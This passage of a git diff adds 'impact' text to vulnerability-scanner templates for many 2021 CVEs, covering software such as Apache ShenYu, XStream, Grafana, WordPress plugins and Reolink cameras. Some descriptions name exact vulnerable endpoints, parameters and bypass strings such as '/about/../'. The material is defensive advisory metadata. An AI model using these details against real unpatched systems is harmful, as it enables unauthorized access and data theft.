vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 50aa7eadd9..7aab7ff313 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential compromise of the entire Apache ShenYu system. remediation: | Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index a18f93051c..db73faee5b 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Virtua Cobranca before 12R allows blind SQL injection on the login page. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying system. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R. reference: diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 329912cb97..2356174b78 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -5,6 +5,8 @@ info: author: whoever severity: medium description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. + impact: | + An attacker can gain access to sensitive information, such as server configuration details, PHP version, and installed extensions. remediation: | Remove or restrict access to the phpinfo.php file in the phpfastcache library. reference: diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index f06d1a975f..9e815bb084 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index e23fa87b43..9814908396 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -5,6 +5,8 @@ info: author: meme-lord severity: medium description: WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update WordPress Redux Framework to version 4.2.12 or later. reference: diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 2482761119..18e14f9680 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. + impact: | + An attacker can exploit this vulnerability to import malicious variables, potentially gaining unauthorized access to sensitive data. remediation: Upgrade to Apache Airflow 2.1.3 or higher. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-38540 diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 3bd11c8ddd..dda3b34df5 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,xstp severity: critical description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges. remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index f031b2ed1b..41b10aa1df 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 04dd3a74de..5fdf82075d 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index b77fe3d593..4827ebf7ee 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM. + impact: | + An attacker can manipulate the Host header to perform various attacks, including phishing, session hijacking, and cache poisoning. remediation: | Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index 9a187a5834..65387a2170 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade XStream to a version that is not affected by CVE-2021-39144. reference: diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 7f36db4789..9795c92e13 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade XStream to a version that is not affected by CVE-2021-39146. reference: diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 62ebb3be5f..1db17e372f 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. remediation: | Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 700c3b1594..baec9c2d3e 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 445adefd92..c68bd24873 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -5,6 +5,8 @@ info: author: dogasantos,noraj severity: medium description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Information disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information. remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 815739640c..de2575db2e 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: high description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). + impact: | + An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature. remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 0be15b661e..b52ab5bba4 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. + impact: | + Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure. remediation: | Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index be9d53ee75..a6017a934c 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP. + impact: | + The vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 08cf4662d7..112a3db674 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 4fdbb40d7d..a81c6f2d84 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. + impact: | + An attacker can gain sensitive information from the target system. remediation: | Update to the latest version of WordPress BulletProof Security. reference: diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 99b8732598..9307876103 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index ec783ac4b6..651d3efc70 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -5,6 +5,8 @@ info: author: Veshraj severity: high description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 1dd9ada392..99c649b191 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function. + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,. remediation: | Apply the latest security patch or upgrade to a newer version of EyouCMS to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index f13c725cf6..6bc8d4fb7d 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. + impact: | + An attacker can obtain the private key, potentially leading to unauthorized access and compromise of the camera. remediation: | Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 2d0ab21104..2038a56320 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially compromising user privacy and security. remediation: | Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150). reference: diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 44b20975e1..8105aa4a95 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: critical description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system. remediation: | Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index 21a4437fce..b6f151b7fe 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass access controls and potentially access internal resources or perform further attacks. remediation: Upgrade to Apache version 2.4.49 or later. reference: - https://firzen.de/building-a-poc-for-cve-2021-40438 diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6fbe1c1a46..e25944303e 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,pdteam severity: critical description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application. remediation: Upgrade to ADSelfService Plus build 6114. reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 93f761111e..5c432d463a 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index c68c71da11..3dc8b9cf19 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system. remediation: | Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks. reference: diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index fb20d7197e..1eace67d08 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d,aringo-bf severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index e2d78fb159..e1a4454afd 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device. remediation: | Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index d93ce1b38c..8cad2a022f 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password. + impact: | + Unauthenticated attackers can gain unauthorized access to affected devices. remediation: | Apply the latest firmware update provided by Auerswald to fix the backdoor vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 42ecdec156..cd14250637 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Upgrade to Cloudron 6.3 or higher. reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 2d22faadcc..6dc29cabb5 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index bb753f3e66..e97361fb7f 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -5,6 +5,8 @@ info: author: oscarintherocks severity: high description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + impact: | + An attacker could use the exposed files.md5 to gain insight into the application's file structure and potentially identify vulnerabilities or sensitive information. remediation: | Securely restrict access to the files.md5 file and ensure that it is not accessible to unauthorized users. reference: diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index ecfd51a15d..1184c7a1a0 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index 41afc07e10..cfb551f37a 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. + impact: | + An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0. reference: diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 41683eb901..14ee89a3bc 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 3628085e9a..3e27e454a1 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 77dd29a3b9..e7be7426e2 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 63bd9b481b..880a6ad81b 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 6a2086118c..452cebd422 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 9e0b955c9d..4d3a6a4432 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -6,6 +6,8 @@ info: severity: 